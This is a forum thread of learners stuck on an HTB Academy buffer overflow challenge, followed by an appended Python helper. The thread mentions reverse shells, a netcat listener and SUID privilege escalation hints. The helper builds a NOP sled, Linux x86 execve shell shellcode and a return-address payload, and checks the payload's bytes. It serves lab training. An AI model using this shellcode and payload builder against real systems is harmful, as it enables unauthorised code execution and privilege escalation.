Hello, I’ve been struggling for a week now… and I can’t seem to find an answer, though I have tried to think outside the box. Maybe I’m still in the Matrix.
The “problem” I see.
The thing is, I’m trying the last challenge of the HTB Academy module:
'Read the file “/root/flag.txt” and submit the content as the answer.'
In the whole tutorial, we see that we can abuse a stack-based overflow in order to spawn a reverse shell, for example. But it does not say anything about privilege escalation.
Some confusing things…
In the exercise it’s said:
After our research, we found out that these messages are stored in "/htb-student/msg.txt," which is binary owned by the user root, and the SUID bit is set.
Although /htb-student/msg.txt has no SUID bit, nor is it root-owned…
Anyway, the approach I have tried is to obtain some other shellcode (for 32-bit Linux) from: http://shell-storm.org.
But I got no luck… I don’t know how I can get to the flag and my light of hope is slowly fading out… Can someone give me a light? Or shall I cry in this dark, dark room?
I’m stuck at exactly the same spot, @blueprismo: I’m able to do nc, receive the shell, etc., but I’m unable to access the file flag.txt. It looks to be a rabbit hole.
Today I’ll return to this; let’s see if I can find another way.
Hi @zuk4, can you give me a hint? I can’t connect between nc and gdb. Thanks.
Send me a PM with what you have done so far and we can see it.
I declare this impossible… this lack of information, and bad writing… confusing, frustrating and not good for learning… the stack is growing the other way (as if the binary is compiled without the flag --no-stack-protector).
Look, I get the reverse shell, but I enter as that normal user, can’t even read it; I’m at the same spot where I began… but with a fancy reverse shell… woah…
I am also stuck on this, I followed all of the stuff that was taught in the tutorial and I have been reading and watching all different kinds of exploits and have learned a lot of stuff but none of them seem to pertain to this challenge. I note what blueprismo said but I am not sure what I am missing
I don’t want to give you a direct answer, as it’s against the rules. But check these points:
1- Did you get a reverse shell (rs)? How?
2- With this rs, what user are you logged in as?
3- You know how sticky bits work, right?
4- Find the file with the sticky bit set.
5- Remember, when you are inside gdb and run "$(python -c blablabla)", it’s the same as executing the script with that parameter, as follows: "./script $(python -c blablabla)"
I can’t help you more; check these points and I’m sure you will pass.
Keep me updated.
Hi all,
can anyone guide me…
I’m badly stuck on the section below…
┌──(kalilinux㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kalilinux:
listening on [any] 443 …
Nothing appears after this…
What should happen? Don’t you need to trigger something remotely?
I believe I have what you are describing with the running of python. I have also read more about SUID and executables. I have tried running python with the file and I can get commands to run, but I stay as the normal user. I do feel like I’m on the right track.
I think that I may have lost sight of the buffer overflow part now. The information I have found on SUID mostly shows abusing the running of particular programs that are part of the Linux system.
I am wary of elaborating on what I have tried, as I don’t want to reveal the things that don’t work and get in trouble.
The issue I had was not due to my understanding; it was the use of smart quotes in the command I was creating. I was using Cherrytree to assemble all of my code, and the default in Cherrytree is to use smart quotes. Once I removed the wrong characters and changed my quotes to the right ones, it worked. The settings I’m talking about are in Preferences > Special Characters > uncheck Smart Quotes.
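As an added example (not code from this thread, from HTB Academy, or from shell-storm): a small Python 3 helper for the "$(python -c blablabla)" hint above and the smart-quote problem in the last post. It builds the classic NOP sled + shellcode + return address argument and checks the two things that silently break it on the way into the target: NUL bytes and a trailing newline, both of which the shell strips from "$(...)" command substitution, and curly quotes (U+2018/U+2019/U+201C/U+201D) that an editor such as Cherrytree may have put into the command text. The offset, return address and shellcode are constructed placeholders, not the challenge's values; the shellcode bytes are the widely published 23-byte Linux x86 execve("/bin//sh") stub, used only as sample bytes.

```python
import struct
import sys

# Constructed placeholders: the real offset, return address and shellcode for
# the HTB Academy binary are not given anywhere in the thread.
EXAMPLE_OFFSET = 100            # assumed distance from buffer start to saved EIP
EXAMPLE_RET_ADDR = 0xFFFFD5C0   # assumed 32-bit stack address inside the NOP sled
# Widely published 23-byte Linux x86 execve("/bin//sh") stub, used here only as
# sample bytes; it contains no NUL bytes, so it survives $(...) substitution.
EXAMPLE_SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)

# Curly quotes that editors with "smart quotes" substitute for ' and ".
SMART_QUOTES = {"\u2018", "\u2019", "\u201c", "\u201d"}


def build_payload(offset, shellcode, ret_addr, ret_repeat=1):
    """NOP sled + shellcode filling exactly `offset` bytes, followed by the
    return address (little-endian 32-bit) repeated `ret_repeat` times so one
    copy overwrites the saved EIP."""
    if len(shellcode) > offset:
        raise ValueError("shellcode is longer than the buffer offset")
    sled = b"\x90" * (offset - len(shellcode))
    return sled + shellcode + struct.pack("<I", ret_addr) * ret_repeat


def check_payload(payload):
    """Return the reasons this payload cannot be passed via $(python -c ...)."""
    problems = []
    nuls = payload.count(b"\x00")
    if nuls:
        problems.append(f"{nuls} NUL byte(s): command substitution drops them")
    if payload.endswith(b"\n"):
        problems.append("trailing newline: command substitution strips it")
    return problems


def find_smart_quotes(command):
    """Positions of curly quotes in a command string. The shell treats them as
    ordinary characters, so quoting of the python -c argument falls apart."""
    return [(i, ch) for i, ch in enumerate(command) if ch in SMART_QUOTES]


def write_payload(path, payload):
    """Write the raw bytes to a file (avoids shell quoting entirely). Note that
    on Python 3, print() would not emit raw bytes; use a binary write."""
    with open(path, "wb") as f:
        f.write(payload)
    return len(payload)


if __name__ == "__main__":
    payload = build_payload(EXAMPLE_OFFSET, EXAMPLE_SHELLCODE, EXAMPLE_RET_ADDR, 4)
    for problem in check_payload(payload):
        print("warning:", problem, file=sys.stderr)
    # Raw bytes go to stdout so `./script "$(python3 build.py)"` receives them.
    sys.stdout.buffer.write(payload)
```

Run it with ./script "$(python3 build.py)" after replacing the placeholder offset, address and shellcode with the values found in gdb; if check_payload reports anything, the argument the target sees will not be the bytes you built, and write_payload plus a redirect or file argument is the safer route. Run find_smart_quotes over the command text copied out of a notes editor before pasting it into the shell.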